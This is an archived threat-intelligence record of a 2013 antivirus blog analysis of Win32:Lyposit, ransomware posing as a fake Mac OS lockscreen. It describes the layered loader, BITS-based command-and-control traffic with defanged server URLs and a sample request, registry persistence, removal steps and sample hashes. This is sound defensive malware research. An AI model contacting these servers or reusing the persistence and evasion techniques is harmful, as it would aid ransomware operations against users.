{
	"id": "3a943fa1-3b54-4165-9869-1a8d919611de",
	"created_at": "2026-04-06T00:06:42.768487Z",
	"updated_at": "2026-04-10T03:20:30.689903Z",
	"deleted_at": null,
	"sha1_hash": "c4d4a363db360bf037a548b8a0ecfedc834d552f",
	"title": "Lockscreen Win32:Lyposit displayed as a fake MacOs app",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 370208,
	"plain_text": "Lockscreen Win32:Lyposit displayed as a fake MacOs app\r\nBy Threat Intelligence Team 20 May 2013\r\nArchived: 2026-04-05 15:46:37 UTC\r\nLockscreen Win32:Lyposit displayed as a fake MacOs app\r\nWhen the mastermind hackers of the notorious Carberp Banking Trojan were arrested, we thought the story had\r\nended. But a sample that we received on May 7th, a month after the arrests, looked very suspicious. It connected\r\nto a well known URL pattern and it really was the Carberp Trojan. Moreover, the domain it connected to was\r\nregistered on April 9th!\r\nTaking a closer look into the PE header, it was observed that the TimeDateStamp (02 / 27 / 13 @ 12:19:29pm\r\nEST) displayed a bit earlier date than the date of the arrests of the cybercriminals, and the URL was a part of\r\nlarger botnet where plenty of Russian bots are involved. So the case was closed as a lost sample within a\r\ndistribution process.\r\nAfter using our internal Malware Similarity Search to catch as many malware samples as possible, a cluster\r\nappeared. It contained some well-known families like Zbot, Dofoil, Gamarue, and some fresh families like\r\nWin32/64:Viknok and Win32:Lyposit. The latter is a dynamic link library and it caught our attention by a quite\r\nsophisticated loader and a final payload.\r\nLoader Analysis\r\nThe starting dropper is a Microsoft Visual Basic executable that unpacks and loads the first hidden layer - another\r\nx86 PE executable. This layer decrypts data in newly allocated memory and the next step is performed there.\r\nAnalysis is made more difficult by resolving WINAPI functions on the fly by a hash and using a multiple\r\ncooperating threads. The main decryption is done by repeating calls of RC2 cipher algorithm provided by\r\nMicrosoft Base Cryptographic Provider v1.0. The next layer is a dynamic linked library and it drops the proper\r\nbinary of the lockscreen.\r\nPayload\r\nLockscreen tries to communicate with its servers through Background Intelligent Transfer Service (BITS) . It\r\ncreates a single BITS Control Class with a background job that downloads files to the client (a parameter\r\nBG_JOB_TYPE_DOWNLOAD for the IBackgroundCopyManager:CreateJob method). It was reported that\r\nmalware in the past used to bypass firewall rules in order to perform additional actions.\r\nURL names are encoded in the data section of a binary file and they appear non-standard on the first sight:\r\nhxxp://n31mp7zeqm7bw35fciw.com/ads1/\r\nhxxp://ljlhkpnqi7n6ddp5yk8hxk.org/ads1/\r\nhxxp://omiuis3tmhjxz6fg2qi.org/ads1/\r\nhxxp://r4fy3cddf87nzgemobxnd.org/ads1/\r\nhttps://blog.avast.com/2013/05/20/lockscreen-win32lyposit-displayed-as-a-fake-macos-app/\r\nPage 1 of 4\n\nhxxp://s32xc6t07ar30mogs8ya.com/ads1/\r\nhxxp://lesgngfrexeigoxd.com/ads1/\r\nAn example of a query to a C\u0026C server:\r\nGET /ads1/?l=P8ZWABgRAFJMQTUApAEAAL6KDni0wESS HTTP/1.1\r\nAccept: */*\r\nAccept-Encoding: identity\r\nRange: bytes=0-4697\r\nUser-Agent: Microsoft BITS/6.7\r\nHost: r4fy3cddf87nzgemobxnd.org\r\nConnection: Keep-Alive\r\nThe string before the equality sign is randomly generated for length between 1 and 5 and the sequence of numbers\r\nafter the equality contains packed information about the victim's location and computer name. The following\r\npicture reveals what's behind the previous request after a decryption ( the first double word is a return of\r\nGetTickCount() call, followed by a constant byte 0x18 and an internal code of procedure that calls the request;\r\nthen we see a magic string \"RLA5\", a value of local identifier, a hash of the DigitalProductId xored with the value\r\nof the InstallDate and finally a hash of Computer Name ).\r\ndecBuffer0\r\nA reverse algorithm that reveals this buffer works like this:\r\nreverseSentData\r\nCommunication protocol is encrypted and the following decryption algorithm is used:\r\ndecodeBITSx\r\nApplying decryptBITS algorithm twice on a received buffer an archive with a complete HTML page finally\r\ndisplayed is obtained.\r\nDepending on the location setting of the victim's computer, particular content for a ransom message is chosen on a\r\nthe server-side. If it is not Switzerland, Italy, Spain, Germany, Russia, Ukraine or possibly other non-US countries,\r\nit could look like this:\r\nhttps://blog.avast.com/2013/05/20/lockscreen-win32lyposit-displayed-as-a-fake-macos-app/\r\nPage 2 of 4\n\nObserve that the background picture (btw. it is called \"US.jpg\" in the archive) and the font style of commands\r\noutput is definitely not a Microsoft Windows command line. Moreover, the highlighted string \"MacOs vers\"\r\nwhispers what the platform pretends to be. But we did not get tricked; this is not another threat for Mac OS\r\nsystems. We can only speculate about the reasons why the malware authors chose this strange masking. One that\r\ncomes to mind is the fact that Mac OS X has a bigger market share in North America and users are more used to\r\nthis style. Who knows...\r\nPersistence\r\nThe lockscreen secures its execution after every start-up using two methods. The first one is fairly regular and its\r\nidea is to silently register malicious library with the correct setting in the registry:\r\nThe second method is more unconventional. The malware registers itself as an extension of the command\r\nprocessor. It means that the malware would become a common component after every run of cmd.exe:\r\nManual Removal of Win32:Lyposit\r\n1. Boot your computer with a live CD\r\nhttps://blog.avast.com/2013/05/20/lockscreen-win32lyposit-displayed-as-a-fake-macos-app/\r\nPage 3 of 4\n\n2. Find upper mentioned registry keys that serve for the persistance of the lockscreen.\r\n3. Find and delete the referenced file in those keys.\r\n4. Restart your computer in Normal Mode.\r\nSources\r\nFinally MD5 of some selected samples with the detections of avast! engine:\r\nLyposit (dropper - layer 0) 06e9ac14027ce9226a448625dbada9b1 Win32:Carberp-AQB [Cryp]\r\nLyposit (dropper - layer 1) 37fb38abacf8ba8c96485898c7d76db2 Win32:Lyposit-A [Trj]\r\nLyposit (dropper - layer 2) b5c22c79cd9148be71232b954f1c4cec Win32:Lyposit-A [Trj]\r\nLyposit (Lockscreen) c40b751e51d85b0c103caa3d55974ce8 Win32:Lyposit-B [Trj]\r\nAcknowledgment\r\nSincere gratitude goes to my colleague Jaromír Hořejší for cooperation on this analysis.\r\nSource: https://blog.avast.com/2013/05/20/lockscreen-win32lyposit-displayed-as-a-fake-macos-app/\r\nhttps://blog.avast.com/2013/05/20/lockscreen-win32lyposit-displayed-as-a-fake-macos-app/\r\nPage 4 of 4",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.avast.com/2013/05/20/lockscreen-win32lyposit-displayed-as-a-fake-macos-app/"
	],
	"report_names": [
		"lockscreen-win32lyposit-displayed-as-a-fake-macos-app"
	],
	"threat_actors": [],
	"ts_created_at": 1775434002,
	"ts_updated_at": 1775791230,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c4d4a363db360bf037a548b8a0ecfedc834d552f.pdf",
		"text": "https://archive.orkl.eu/c4d4a363db360bf037a548b8a0ecfedc834d552f.txt",
		"img": "https://archive.orkl.eu/c4d4a363db360bf037a548b8a0ecfedc834d552f.jpg"
	}
}